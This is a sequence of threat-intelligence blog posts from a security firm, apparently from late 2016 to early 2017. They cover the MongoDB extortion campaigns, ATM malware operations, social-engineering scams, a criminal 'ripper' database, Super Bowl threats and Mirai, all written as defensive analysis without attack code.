    Disseminate The results of the analysis are disseminated to both tactical consumers (SOC etc) and the strategic sponsors of the project i.e. the members of the ‘c suite’ with an interest in the issue

    What can be seen from the above example is that the intelligence cycle and the F3EAD cycle can be employed closely together to fulfill the overall company’s intelligence requirements, both tactical and strategic. One way of visualizing these two cycles is as cogs turning together within the intelligence process, with intersections between the intelligence cycle’s “Collection” phase and the F3EAD cycle’s “Find” phase. This relationship is shown below.

    F3EAD and Intelligence Cycle

    To learn more, subscribe to our threat intelligence emails here.

    How the Frenzy Unfolded: Analyzing Various Mongo Extortion Campaigns Tue, 07 Feb 2017 15:30:59 +0000 The MongoDB “ransom” pandemic, which has been in the spotlight for the best part of a month, still appears to be affecting MongoDB installations and various campaigns still appear to be receiving payments. The latest payment for one of the campaigns has been as recent as the January 20, 2017.

    Recent Bitcoin Mongo Figure 1 – Recent bitcoin transactions for the files named PLEASE_README

    This post will provide additional insight into our previous research in an attempt to identify a timeline of when the first campaigns started and the subsequent copycat campaigns. While we are aware that there were already attacks on open Mongo databases focusing on deleting data, this new approach appeared to be the first widespread, multi-campaign attack based on extortion. We define these attacks as extortion rather than ransom since most campaigns did not appear to even attempt to view or backup the data before deleting.

    As per our previous research into open MongoDB services, we set out to identify publicly available open Mongo Status Interfaces. The MongoDB HTTP Status interface is designed for listing information that may be of interest to the database administrators, including database version information, system information and recent client requests. These status pages listen on TCP port 28017 rather than port 27017 commonly used for MongoDB itself. The Status Interface service has been deprecated since version 3.2.

    By scraping the logs of publicly accessible MongoDB Status pages, we reviewed the logs for almost 7,000 MongoDBs. These logs provide information regarding connections to the MongoDB, including the deletion and creation of databases and the times which they occurred. We gathered and collated a list of the times that DB allocations and drops occurred for these 7,000 deployments. Using these results we are able to get a rough estimate of the timelines and volumes of these various MongoDB extortion campaigns. The campaigns shown in Figure 2 can be identified by the naming conventions.

    Rate of Dbs created

    Figure 2 – Rate of databases created over time, per campaign.

    The dataset also provided us with a good indicator of the largest campaigns and the battle raging between them. The output below showing one campaign dropping the “WARNING” database, and creating “PLEASE_READ”.

    01:20:57.810 [conn670] dropDatabase WARNING starting

    01:20:57.810 [conn670] removeJournalFiles

    01:20:57.816 [conn670] dropDatabase WARNING finished

    01:20:57.940 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.ns, filling with zeroes…

    01:20:57.944 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.ns, size: 16MB,  took 0.003 secs

    01:20:57.944 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.0, filling with zeroes…

    01:20:57.946 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.0, size: 64MB,  took 0.001 secs

    01:20:57.946 [FileAllocator] allocating new datafile /var/lib/mongodb/PLEASE_READ.1, filling with zeroes…

    01:20:57.953 [FileAllocator] done allocating datafile /var/lib/mongodb/PLEASE_READ.1, size: 128MB,  took 0.006 secs

    01:20:57.954 [conn670] build index PLEASE_READ.PLEASE_READ { _id: 1 }

    Figure 3 – An example of competing efforts by ransomware actors, with files being reallocated over a short period of time

    The total number of malicious databases created is shown below. The tally can include multiple database creations on a single server, as this can occur when various campaigns have overwriting each other repeatedly. It is also worth noting that some of the status pages reviewed provided data for non-public localhost only databases, so they wouldn’t be affected by the attacks.

    7010 PLEASE_READ
    4223 WARNING
    543 PWNED

     Figure 4 – Malicious DB names

    MongoDB status pages also provided a lot more information that could be used by attackers. This was with the aim of gaining authorized access to databases that have been secure, however it left the status and logging service open.

    Mongo publicly visible logs

    Figure 5 – Publicly Visible Logs – User authentication

    The MongoDB documentation states that the HTTP status interface should be disabled in production environments in order to prevent this kind of data exposure.

    Final thoughts

    The various campaigns appear to still be rampaging through the public domain, overwriting each other and newly created databases. This will likely continue while people are still feeding the frenzy with Bitcoin payments and attempting to restore backups while still neglecting to password protect their MongoDB instances or firewall them off from the outside world.

    Ready for the Blitz: Assessing the Threats to Super Bowl LI Thu, 02 Feb 2017 18:31:35 +0000 Like any major event, Super Bowl LI brings with it the heightened risk of malicious cyber activity. The lead up to last year’s game was dominated by security concerns over cyber attacks given the abundance of fiber optic cables in and around the San Francisco 49ers’ stadium, the venue for Super Bowl L.

    Although we have yet to detect any audible calls to target the 2017 event being held at the NRG Stadium in Houston, we can look back at previous Super Bowl activity, as well as wider comparisons to other major sporting events that we have monitored for an indication of the type of threats that may come to pass this year.

    Touchdown or Tangodown?

    Previous large-scale sporting events such as the 2014 World Cup in Brazil or the 2016 Rio Olympics were beset by hacktivist activity. In Rio we saw a large number of data leaks and denial of service (DoS) attacks. More recently, the African Cup of Nations football tournament experienced two separate DoS attacks, one against the event website itself, while the other successfully disrupted the website of the event’s main sponsor, the French multinational oil and gas company Total. In this case the hacktivists were participating in the OpGabon campaign, which was purportedly established in 2013 to denounce killings conducted for political gain by the current president Ali Bongo.

    While no dedicated campaign against the Super Bowl has surfaced among the hacktivist community, there always exists the possibility that hacktivists will use the global platform of major sporting events as an opportunity to further their ideological goal. Anonymous affiliated actors have already promoted the OpSafeWinter campaign, with one Anonymous actor calling on support for Houston’s homelessness efforts ahead of Super Bowl LI. Moreover, a small community of activists have called for a boycott of this year’s game on the grounds of allegedly restrictive laws passed affecting women’s health in Texas. While neither have been connected to a hacktivist campaign, the point being stressed is that hacktivist actors can at any point leverage a highly publicized spectacle to highlight specific local (or even national) grievances.


    Figure 1: OpSafeWinter campaign material disseminated via Twitter

    Fake Mobile Apps and Phishing Attacks

    Sponsors and organizers are not the only ones at risk, fans and even television broadcasters also have reasons to fear for their online safety. Phishing emails such as this one (below) identified by SANS were used in 2015 to infect victims with credential harvesting malware. Fake apps innocently downloaded by attendees can also be used to hide and distribute malware live during the game.

    Superbowl Phishing

    Figure 2: Phishing email using Super Bowl lure to deliver malware [Source:]

    Ticketing Violations

    Unsurprisingly, the high demand for tickets opens the gate for ticketing scams. While some sellers will attempt to sell their tickets for extortionate prices, attendees should also beware of sellers who may never come through on their promises. We recently detected the following seller offering Super Bowl ticket packages on two dark web marketplaces. While we could not verify whether the tickets were legitimate, a closer look at the seller’s other online offerings should drive prospective buyers elsewhere. Those still looking for tickets are advised to use trusted ticket merchants, and remember that it’s easy for scammers to set up legitimate-looking sites using techniques such as typo-squatting.

    Dark web sales

    Figure 3: Dark web marketplace seller offering Super Bowl tickets

    Dark web sales2 

    Figure 4: Other great offers by this seller, including fake IDs, tickets and malware tools

    Point of Sale Interceptions

    With hundreds of thousands of fans expected to rush to the Houston area this week, cybercriminals will likely look to pocket out of the increased number of transactions being made at ATM machines and local stores, hotels and restaurants using point of sale (PoS) software. Only last week it was revealed that customers who used their debit or credit cards at Houston area Popeye’s restaurants were at risk of data theft, after malware was identified in the computer systems at seven locations. Though these potential breaches occurred in mid-2016, we can expect credit card fraud to increase in the week leading up to the Super Bowl.

    Assessing the Field of Play

    Overall, we can group the potential threats into those affecting businesses and those that target supporters:

    Threats to Consumers and Suppliers

    While explicit hacktivist campaigns or evidence of targeted malware has yet to materialize, by anticipating some of the potential threats associated with an event of this scale, sponsors and fans can better tackle all eventualities. Digital Shadows will be monitoring these developments as kick off approaches in case the attackers decide to call the blitz.

    Making Cents of ATM Malware Campaigns – Comparing and Contrasting Operational Methodologies Mon, 30 Jan 2017 13:49:05 +0000 Throughout 2016 some of the most notable reporting on criminal activity targeting the financial sector related to the use of ATM malware by a group of threat actors identified as the “KS Group”, an organized crime group (OCG) believed to be based in Russia. The group adopted a relatively unusual operational methodology in which ATM malware was deployed onto targeted machines ahead of time through a computer network intrusion and then money mules were sent in to activate the malware and collect the cash. However, this type of operation was unusually complex; the majority of reported ATM malware activity has involved mules manually installing malware by physically interacting with targeted machines.

    Manual Infection vs. Network Intrusion

    The organizational charts below show hypothesized versions of how OCGs would need to be structured in order to conduct different types of ATM malware operations.

    Figure 1

    Figure 1 – Organizational chart for manual malware deployment.

    Figure 2

    Figure 2 – Organizational chart for malware deployment through network intrusion.

    These models show that deploying malware manually requires a much simpler set-up. However, in this model the mules represent a chokepoint – they are forced to spend far longer interacting with each ATM due to the requirement that they force the machine open and go through an installation process. This also increases their physical exposure and operational risk.

    Conversely, the organizational structure for a network intrusion-based operation is complex – the actions of two teams must be coordinated. Moreover, a requirement for specialist personnel to conduct network intrusions is likely to increase operational costs. However, mules are required to spend far less time interacting with each ATM and will not have to engage in obviously suspicious behavior, such as forcing a machine open. This can allow more ATMs to be targeted at once, potentially resulting in a greater sum of money being obtained than would be possible for a physical deployment operation conducted over the same timeframe.

    Informing Defender Action

    Based on these organizational structures and analysis of previous ATM malware operations, hypothesized operational kill chains for both types of operation have been developed. Understanding the different stages of each operational can enable the identification of key points where defender action can increase attacker operational costs or create opportunities to discover an operation.

    Figure 3

    Figure 3 – Kill chain for operations where ATM malware is deployed manually.

    The simpler nature of this type of operation means that opportunities for defenders to act are likely to revolve around limiting opportunities to gain unsupervised access to ATMs and prioritizing ATM system updates when new vulnerabilities are identified.

    Figure 4

    Figure 4 – Kill chain for operations where ATM malware is deployed through a network intrusion.

    While the more complex nature of this type of operation presents greater number of opportunities for defenders to act, the nature of these opportunities is more fleeting. Mules spending less time interacting with ATMs reduces the likelihood of physical security measures identifying them as acting suspiciously. Furthermore, opportunities for network defenders are heavily dependent on the adoption of best practices across an entire corporate network, a task which can be challenging even for small organizations, let alone multinational banks.


    Reporting of criminal activity involving ATM malware has indicated that although significantly more complex to plan and execute, network intrusion based operations like those carried out by the KS Group have the potential to produce very high profits. While beyond the capability of many criminal groups, more sophisticated criminals are likely to take note of the success of this approach in the future. It is, therefore, important for network defenders to take note of how these types of operations have been conducted in the past in order to prepare for and mitigate such attacks.

    Dial “M” for malware: Two-factor scamming Thu, 26 Jan 2017 17:53:16 +0000 Adversaries are developing new ways of attacking you using old forms of communication. Make sure your communication of this issue is equally as effective.

    Social engineering is a term that covers a broad spectrum of malicious activity and tactics to “exploit the human”. Often this involves tricking them into divulging information or performing tasks that assist an attacker. In recent incidents, we noted the use of phone calls as a pre-requisite to a cyber-attack but how are attackers increasingly using this tactic?

    In one recent incident, UK-based educational institutions were warned of a campaign targeting them with ransomware. The attack was initiated by a cold-caller purportedly from the ‘Department of Education’ (rather than the Department for Education) requesting the email address of a senior employee, usually the head teacher. The caller alleged that they had sensitive documents which needed to be sent to the individual rather than a generic inbox. The victim was then targeted with a phishing email containing a malicious attachment seeking to infect them with ransomware.

    In another example, the organized criminal group Carbanak (aka Anunak) also used phone calls as part of their tactics. They reportedly targeted multiple companies in the hospitality sector with malware, potentially to harvest bank card information from point of sale devices. This involved phoning the company claiming to be unable to access an online reservation, emailing them a fraudulent reservation document, and staying on the call whilst the recipient opened the document and inadvertently infected their system with information harvesting malware.

    Similarly “technical support scams” are another popular tactic whereby users receive calls from a phony tech support or “Windows Support Centre” offering to remove a virus or resolve an imaginary technical problem. Some offer to do this for a fee; others appear more altruistic. The victim is directed to install software which would grant the threat actor remote access to their system, following which a variety of malicious acts are undertaken including malware infection and data theft. TalkTalk customers were warned of these kinds of scams after a customer data breach in October 2015.

    As education and awareness grows regarding the threats of malicious emails and suspicious documents, the addition of the phone-call introduces a new and personalized aspect to the scam. It highlights the efforts to which some threat actors will go, as well as the creativity involved. Accessing the necessary contact telephone numbers is relatively simple. Companies and organizations often publicize a general enquiry number, and the actors then rely on deceiving staff and employees to divulge employee personal contact details. Public directories have long been used by fraudsters for cold-calling, a tactic which has simply been adopted by cyber threat criminals as well. Below is a table highlighting the Strengths, Weaknesses, Opportunities and Threats (SWOT) of this particular scam. SWOT is an effective tool providing both a current view of the threat from the attacker’s point of view, and also an element of forecasting.

    Cold Calling SWOT

    Fig 1: A SWOT of the cold-calling tactic

    Along with efforts to educate employees on the associated risks, another line of defence is for companies to use call answering services, which can help to triage out potential malicious calls. The advice is to treat all unsolicited calls with scepticism and suspicion, do not provide personal or financial information to the caller, and certainly do not agree to install software on to your device unless you are confident of its purpose. As with all scams, it’s better to be safe than sorry.

    Organizations affected by data breaches, which then may expose customers or employees to these kinds of approaches are advised to develop “playbooks” of how to respond in the event of such incidents happening. This might include the reissue of credentials where possible and the provision of appropriate guidance and awareness to those individuals affected.

    Innovation in The Underworld: Reducing the Risk of Ripper Fraud Mon, 23 Jan 2017 22:11:16 +0000 Reputation is incredibly important for business. This also applies to cyber criminals who buy and sell goods and services in online marketplaces. Fraud between cyber criminals has always been an issue that limited the profitability of their malicious campaigns. Those who commit fraud, often known as “rippers,”  commonly engage in activities such as:

    • Selling dumps of fake social media credentials
    • Selling invalid or used stolen credit cards
    • Stealing money by not delivering promised goods

    From the defender’s perspective, rippers can be beneficial. A 2009 Microsoft paper, argued that, in essence, cyber criminal markets are lemon markets where buyers can’t differentiate low and high quality goods, therefore providing a breeding ground for rippers. Every transaction within the market then comes with a “ripper tax” attached to it, decreasing profits for both legitimate buyers and sellers. This in turn, slows the market down and makes further cyberattacks less lucrative.

    So if rippers are beneficial to defenders, why are we writing about this and why should you care? Because a new service has emerged that’s aimed at revealing rippers and reducing the problem of fraud so that cyber criminal marketplaces can flourish.

    In June 2016, “Ripper[.]cc” came online looking to disrupt this niche. Ripper[.]cc is a database of rippers and currently contains close to one thousand ripper profiles. Visitors can create profiles including the ripper’s identities across multiple forums. The profiles include various contact and identification information, as well as the details of the specific scamming case (known as a “black”).

    Ripper Homepage

    Figure 1: The Ripper[.]cc front page

    Ripper[.]cc is not the first attempt to shield the marketplace from ripper tax. Prior to Ripper[.]cc, a number of methods had been devised to minimize the risks associated with rippers with limited success:

    1. First is the escrow system. A marketplace user (usually an administrator) trusted by both sides of a transaction will hold the buyer’s money until the transaction is confirmed. The escrow system is great at facilitating trust, but can be slow, inconvenient and requires a very trustworthy third party.

    2. The second solution is blacklists. Most cyber criminal forums have an arbitration section and administrators can ban users for various reasons, being a ripper among them. This however does not stop a ripper from operating on other forums or interacting with “victims” directly (e.g. through jabber instant messaging).

    Forum Blacklist
    Figure 2: An example blacklist on a criminal forum (Source: https://f*ckav[.]ru/forumdisplay.php?f=55)

    3. Finally, the service kidala[.]info (“kidala” is Russian for ripper) has been aggregating a database of rippers since 2005. It is useful because it offers a large amount of ripper information and is also independent from any forums. However, it has all of the limitations of forum blacklists. Furthermore, users have complained that the reporting is not always impartial and it is possible to remove the ripper status for money.

    More than a facelift

    While the UI of Ripper[.]cc is impressive, the creators of the service do not appear to have been satisfied with a more usable, cleaner-looking version of kidala. Ripper[.]cc offers Firefox and Chrome extensions, as well as a jabber (PsiPlus) plugin. These extensions seek to address the main issue with forum and kidala blacklists – the fact that they only exist on those individual platforms. The plugins highlight rippers present in the Ripper[.]cc database in the user’s browser and jabber chats, allowing customers to recognize rippers with ease.

    Ripper Plugin

    Figure 3 (a, b): 2 examples of Ripper[.]cc in action. The top (a) is the jabber plugin and the bottom (b) is the browser extension (source: screenshots from Ripper[.]cc)

    The extensions highlight known rippers either directly on the site’s page or within the PsiPlus application (Figure 3a). The browser extensions (Figure 3b) allow the customer to easily pivot to the profile on Ripper[.]cc revealing their identifying information, forum accounts and the reason they were blacklisted. The relevant data is fed to the extensions once every 30 or 60 minutes via the Ripper[.]cc  API.

    Taking a page from legitimate startups

    The development  of the Ripper[.]cc service is of interest as it parallels with how legitimate technology startups develop their products. The initial idea for this service was discussed on exploit[.]in as early as mid-2015 (forum[.]exploit[.]in/index.php?showtopic=98556&st=0). The project’s “founders” officially revealed the service (Figure 4) in July 2016 via a forum post after having some difficulties recruiting programmers to develop it for them (see Figure 6). In the post, they invite customers to the forum and start a discussion about its features and problems.

    Original Promotion of Ripper

    Figure 4: Original promotion of the forum on exploit[.]in 

    In this initial posting or “pitch” and subsequent discussions, clear similarities can be seen between this and legitimate technology startups. The founders plainly acknowledge their intention to displace the previous main player – – and try to win customers over by promising better features. They also have to prove their credentials – in this case by saying that a number of well-known forums support this project and their existing reputation on these forums.

    Just like real startups, monetization is brought up as a key consideration, with suggestions such as an advertising or a subscription-based payment model. While this is normally brought up by investors seeking to understand how they will make money, in this case, the potential customers are the ones who want to know. But not for the same reason. Without understanding how Ripper[.]cc makes money, the customers can’t trust it. Perhaps the plugins could be malicious or rippers could be added or removed for money. The team responds that source code will be open source and that, at least initially, advertising will provide the main income (indeed, ads can be seen on the site now ripper[.]cc/ads). Furthermore, trust is to be facilitated by including administrators from four well-known forums in the service’s arbitration team.

    Ripper Reporting

    Figure 5: English-language version of the site’s reporting functionality (Source: Ripper[.]cc)

    Interestingly, the team behind the service has bigger plans for the project, demonstrating their ambitions for “scaling up.” The site already has an English version (Figure 5) and they want it to become a universal service for finding rippers online – cyber criminal marketplaces are just their proof of concept. An escrow service (another possible income stream) and even a mobile application have also been considered (Figure 6).

    Ripper Recruitment

    Figure 6: Discussion between one of the assumed founders of the project (user 2) and a programmer (user 1) that user 2 is trying to recruit to do some work on the project (Source: Publicly available Jabber chatlogs)

    Despite a consistent number of profiles added to the site since July 2016 (Figure 7), it is currently unclear whether the popularity of the service will grow significantly. Although there is already evidence of its use across multiple marketplaces (including the four founding forums – see Figure 4).

    Ripper profile average age

    Figure 7: Average age of ripper profiles on Ripper[.]cc

    Ripper[.]cc is another example of the industrialization of hacking and the growing professionalism of cybercrime. If such a service becomes successful, it enables cyber criminals to significantly reduce the risks associated with rippers and the overall cybercrime economy can become more profitable allowing for further growth.

    To learn about other digital risks and how to better manage them, download our report: Digital Risk Management – Identifying and Responding to Risks Beyond the Boundary.

    Known Unknowns: Key Events to Keep Your Eyes Out for in 2017 Thu, 19 Jan 2017 12:58:20 +0000 On Friday, millions will tune in to see Donald Trump inaugurated as the President of the United States. This will be just 3 weeks after the US Office of the Director of National Intelligence (ODNI) published a declassified version of a U.S. intelligence community assessment (ICA) on Russian operations reportedly conducted with the intention of influencing the outcome of the 2016 U.S. presidential election.

    The report made a number of highly significant assessments most notably that Putin personally ordered an influence operation intended to undermine U.S. public confidence in the electoral system and negatively impact the electability of Hillary Clinton. The report stated that the influence operation was conducted using a combination of methods, included targeted network intrusions, the use of deniable entities to disclose proprietary materials and a “propaganda campaign” conducted by Russian state media and semi-independent “trolls”.

    However, this is just one recent example of cyber related activity that is tied to geopolitical events. To use Rumsfeld terminology (apologies, everyone), many of these are unforeseen, unknown unknowns that institutions must be resilient to. However, there are also many known unknowns; key dates in 2017 that are likely to involve an element of cyber activity. In the table below, I’ve outlined what I see as the key known events of 2017.

    2017 Key Events

    You’ll notice that there are at least six significant elections set to take place in 2017. With elections set to take place in the Netherlands, France, Hong Kong, Germany and South Korea, political parties, government institutions and media organizations should not be caught unaware. There are already concerns. Ahead of the German election, Facebook announced a fake-news filtering service for their German users. It’s also no surprise that the French authorities are bolstering their own security ahead of their election.

    Of course, it’s not all about a game of chess between nation states, however. In June, the Confederations Cup will begin in Russia and, if the World Cup and Olympics are anything to go by, the sponsors of the competition may expect to be targeted.

    At the lower end of the capability spectrum, hacktivist campaigns like OpIsrael and both reoccur annually. While the campaigns have received less and less attention as the years have passed, by monitoring for activity levels associated with these campaigns, organizations can be better prepared for emerging threats.

    While you can’t predict what’s going to happen in 2017, by understanding which events may have an impact on your industry or geography, you can plan ahead for these.

    Two Ways to Effectively Tailor Your Intelligence Products Tue, 17 Jan 2017 14:01:53 +0000 In my previous blog, “Trump and Intelligence: 6 ways to deal with challenging intelligence consumers,” I focused on six ways to effectively communicate and tailor intelligence to uninformed and/or difficult executive audiences. I want to make this a blog series and expand upon some of my guidance from that blog. I am cheating a bit; I’m using this blog to build out content for my World War II themed SANS Cyber Threat Intelligence Summit presentation, “Inglorious Threat Intelligence.”

    Today, I want to dig a bit deeper into aspects of the intelligence consumer. I suggested building briefing dossiers for your intelligence consumers. Dossiers are a long-standing intelligence products for the IC; they are often used by policy makers to better understand foreign leaders. During World War Two, Harvard Professor Henry Murray was commissioned by the The Office of Strategic Services to conduct a personality analysis of Adolf Hitler. The goal of the analysis was to attempt to predict his future behaviors and develop suggestions for dealing with him during and after the war (see image 1.)

    Hitler Personality Analysis

    Image 1. Analysis of the personality of Adolph Hitler.

    There are several ways we can adapt dossiers to our own security programs.

    1. Develop threat intelligence consumer personas. Buyer personas come out of the marketing world. Buyer personas are developed to better understand the target customer. Buyer personas can include the individual’s concerns, needs, motivations, skills, and reporting structure. Using personas to better understand prospects and customers ensures that what you produce is beneficial and tailored to that group of individuals. Take a look at this article for additional detail. Buyer personas can be adapted for threat intelligence consumers; by better understanding who you are producing intelligence for, you can improve the overall quality of your production. I think a key point to draw out is that in this scenario you are producing intelligence versus simply consuming intelligence from a 3rd party. This is an important step in the maturation of a threat intelligence capability. Some example intelligence consumer personas include the following roles:

    a. Security Operation Center analyst

    b. Threat hunter

    c. Chief Information Security Officer

    d. Other C level executives

    e. Business unit / Line of business leader

    2. Build briefing dossiers for specific intelligence consumers. For some of your intelligence consumers, you are going to need to have more detail. Personas address a functional area within the organization, whereas dossiers are specific to an individual, a very strategic consumer of your intelligence. When building out dossiers for specific consumers you should include the following:

    a. What is the ideal outcome when working with this individual? Are you seeking to influence the policy of your organization? Are you attempting to educate the individual on the threat landscape? Whatever your goal is, and you should have one, you need to have it documented and then make sure any intelligence product you develop aligns with your goals.

    b. After each interaction with one of these strategic intelligence consumers, you need to conduct an after-action review. What was effective in the interaction? What was ineffective? Capturing this information is critical to your success. The more positive “touches” you can get with these strategic consumers the better. You can set yourself up for positive interactions.

    c. In the event you have never read Dale Carnegie’s best-selling book “How to Win Friends and Influence People,” I highly recommend that you do so (see image 2). Carnegie was quite the social engineer; this book remains highly relevant today and can help you to effectively communicate.


    Image 2. “How to Win Friends & Influence People”

    In future blogs in this series, I’m going to dig deeper into the creation of these intelligence consumer personas as well as a how to establish a framework for constructing dossiers on your strategic intelligence consumers.

    All You Can Delete MongoDB Buffet Thu, 12 Jan 2017 13:45:19 +0000 A number of extortion actors were detected accessing unauthenticated MongoDB installations and replacing their contents with a ransom note, usually containing an email and Bitcoin address and the usual “we have your data” message. The earliest activity we observed was from December 20, 2016 at which time there appeared to be only one actor conducting the activity using the nickname “harak1r1”. Since then, the number of actors involved (or at least the number of unique identifiers) increased – on January 10, 2017, that number was at 11. Approximately half of these actors had received ransom payments (between 0.2 BTC and 0.5 BTC) based on the transactions made into their Bitcoin addresses. Their overall earnings were relatively low, with the highest at around $7,962 USD.  This isn’t bad considering the low capability, low amount of resourcing required and the short duration of the activity. When last checked, the reported number of affected instances was between 27,000 and 28,000.

    On January 6, we set up a honeypot running a MongoDB installation without authentication. At some point over the following weekend it was ransomed, with the given email kraken0[at]india[.]com). The time between establishing this honeypot and a ransom note appearing, coupled with the reported number of infected installations over a couple of days, showed the pace at which this activity was occurring.


    Ransom demand honeypot 

    Fig 1 – A screenshot of the ransomware demand from our honeypot 

    On January 11, a Pastebin post by an actor purporting to be “kraken0” uploaded an advertisement for “MongoDB ransomware” to the text sharing site Pastebin (see Fig 2). The advertisement for this purported ransomware suggested it was written in the c# coding language. The author of the post claimed the script could handle “1,000 IPs per second” and that this could be higher with the necessary infrastructure. The author claimed the CPU load of the script was low but that RAM was important if the operator was using a large list of IPs. A list of IPs was purportedly included in the source code.

    Kraken for sale

    Fig 2: A Pastebin post from January 11, 2017 

    Overall, the package offered included the “kraken” source code, 100,000 IP lists with open MongoDB installations and a mass MongoDB scanner. This was offered for $200 USD in Bitcoin and could be purchased via contacting the actor’s email address. We previously assessed it as almost certain at least some of the actors involved were using automated scripts to scan for Internet-facing, unauthenticated MongoDB installations, following which the contents would be replaced with a ransom note containing actor identifiers.

    At the time of writing the identifiers associated with the “kraken0” actor were independently reported to have been discovered on 21,642 open MongoDB installations. Research into the Bitcoin addresses associated with the actor showed they had received a total of $7,962 USD spanning 95 transactions since January 7. The actor had withdrawn all of these funds from the address as at January 11. It was not confirmed if all of these transactions were ransom payments.

    While we have not detected enough evidence to judge whether this was a genuine offering at the time of writing, the use of an automated script to identify open MongoDB installations is consistent with our previous assessments on this extortion activity. Some of the capabilities described by the actor were within the realms of possibility and, should they be genuine, provide some explanation as to the number of MongoDB installations the actor has managed to affect when compared to other actors conducting similar extortion attempts. However, the claims around the CPU load of the script and the contents of the offering could not be judged. The actor kraken0 has demonstrably received ransom payments from at least some of the affected victims, and if this is a genuine offering it would suggest the actor is likely intending on discontinuing their extortion activity and instead attempting to sell their tools.

    We had previously assessed that the number of actors conducting the extortion activity would cause overlapping extortion attempts and reduce the viability of this method over time. This offering is a possible indication the actor kraken0 had decided the tactic they were using was no longer profitable or viable, or that the actor was attempting to take the ransoms they had received and disappear. It is considered less likely the actor intended to continue their activity after selling their tooling, as this had the potential to create unnecessary competition for a method that had been lucrative.

    10 Ways You Can Prepare for DDoS Attacks in 2017 Wed, 11 Jan 2017 15:10:23 +0000 At the end of last month, we published a paper that forecasted the DDoS landscape for 2017. By using the cone of plausibility, we were able to confront our current assumptions and assess the different ways in which denial of service poses threats to organizations in 2017.

    Since the Mirai source code was released by a user on several months ago, the DDoS landscape has evolved. It’s important that we understand the continuing development of botnets at a broader level. However, it is equally important not to lose sight of other DDoS threats. By understanding Mirai in a broader context, we can consider how the DDoS landscape will evolve over the next year and align security programs accordingly.

    anna senpai hackforums

    Figure 1: Post by user “anna-senpai” on on October 1, 2016

    To build resiliency against DDoS attacks into your security programs, we recommend the following ten steps:

    10 Steps to Prepare for DDoS Attacks

    10 Steps for Preparing for DDoS

    Trump and Intelligence: 6 Ways To Deal With Challenging Intelligence Consumers Wed, 04 Jan 2017 15:28:02 +0000 It is no secret the President Elect Trump is skeptical of the Intelligence Community (IC). He has openly questioned Russia/US election “hacking” on many occasions. This week he tweeted:


    Trump has also shunned the longstanding Presidential Daily Intelligence Brief. The Washington Post wrote about it here: “Trump turning away intelligence briefers since election win.

    President Trump doesn’t have a full understanding of intelligence tradecraft, how organizations are compromised, or the incident response process. Just to be clear, I have no partisan or hyperbolic intentions with these statements. First, he tweets about catching the “hackers in the act.”

    Trump Hackers In The Act

    Second, Trump quotes Assange and talks about the DNC being so careless. He doesn’t understand that “careless” is the status quo, regardless if you are a political organization or a Fortune 500 company. He also minimizes the threat from teenager “hackers.” During the Presidential Debates, Trump alluded to 400 pound hackers sitting in their beds.

    Trump Podesta Assange Tweet

    It can be easy for those of us in the cyber security and intelligence communities to scoff at Trump’s perspective of these issues. The reality is that over the next four years, Trump is going to be a challenging consumer of intelligence products. To have any chance of successfully communicating with Trump, the IC is going to have to tailor their products to this very difficult intelligence consumer.

    There are lessons that we can apply to our own organizations. When it comes to technology and cyber security, Trump isn’t that different than most of your key executives. They aren’t technologists; they aren’t practitioners and they certainly don’t understand things that we know to be true. With this in mind, I want to focus on six ways to effectively communicate and tailor intelligence to uninformed and/or difficult executive audiences.

    1. Use their terminology; not yours. Those of us from both the intelligence and cybersecurity communities have a tendency to use our own abbreviations and terminology. Unless your intelligence consumer comes from your community, they won’t understand what you are trying to communicate. Use their own lexicon and analogies to help communicate your message.
    2. Focus on what they care about. If you are creating products for a technical audience, Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) are fine. They aren’t acceptable for executive level products. Business risk, assets, liabilities, profit and loss are terms executives are interested in. This has been said for many years; yet the problem persists.
    3. Create a personal story that resonates with your consumer. With as expansive as Trump’s business interests are and how pervasive intrusions are, it is highly likely that one of his companies has suffered a breach. The impact to his own business interests could be used to help Trump understand how intrusions work and what their impact is. Learn the art of storytelling and come up with a narrative that your audience can personally identify with.
    4. Build briefing dossiers on your intelligence consumers. You build dossiers on your adversaries, why not build them for your intelligence consumers. What are their trigger words? What are the passionate about? Understanding and documenting what to say and what not to say is key for effective communication with a challenging consumer. Capturing this information is key; you need to learn from your successes and failures. Given the rate of turnover within organizations, capturing this knowledge is important for continuity of production.
    5. You may have to alter your existing practices. Just because you have historically done something, doesn’t mean the approach can automatically be applied to a new intelligence consumer. In Trump’s, case the IC might have to shift from the daily intelligence briefing to a weekly intelligence briefing. (I know this is a foreign concept to many of us from the IC who have directly or indirectly contributed to the PDB). When it comes to intelligence products, one size doesn’t fit all. You will have to tailor your intelligence product’s format and timetable to the audience.
    6. Engage with them outside of official work channels. Look for ways to interact with your intelligence consumers outside of official forums and meetings. Would they be willing to mentor you? Could you take them out for lunch or coffee?  This should resonate with people from our space, come up with a benign social engineering strategy to establish trust that will be the foundation of an ongoing relationship.

    Challenging intelligence consumers aren’t going away, so you must develop a strategy to make the best of the situation. Shifting an intelligence consumer from uninformed or adversarial position to a champion can be successful. I’d love to hear your ideas for helping this shift be successful.

    Mirai: A Turning Point For Hacktivism? Fri, 16 Dec 2016 16:36:34 +0000 A “digital nuclear attack”. A “zombie apocalypse”. “The end of history. “

    Much has been made of Mirai, the recently discovered malware that incorporates Internet of Things (IoT) devices into botnets capable of conducting the largest distributed denial of service (DDoS) attacks measured to date. Some reports have focused on the in-depth technical detail behind the malware, while others have taken the hyperbolic route – cue images of zombie fridges and the impending digital Armageddon.

    But what hasn’t really been explored is Mirai’s potential impact on the activities of particular threat actor groups. Our latest whitepaper forecasts the threat posed by these different groups. This blog focuses on one group in particular, hacktivists.

    Although some hacktivist attacks have been impactful, most are low-level, unsubstantiated, and result in minimal disruption to targeted organizations. Hacktivists have high levels of intent, though often lack the technical capability to back this up.

    Mirai, however, could be a game-changer for hacktivism. In late September the malware’s source code was posted online and was freely available to download. Since then a link to a GitHub repository containing the source code has been posted to an OpIcarus Facebook page (see Figure 1 below).

     Mirai OpIcaurs

    Figure 1: Mirai source code posted to OpIcarus Facebook page

    In the context of hacktivism, these developments are significant for two reasons:

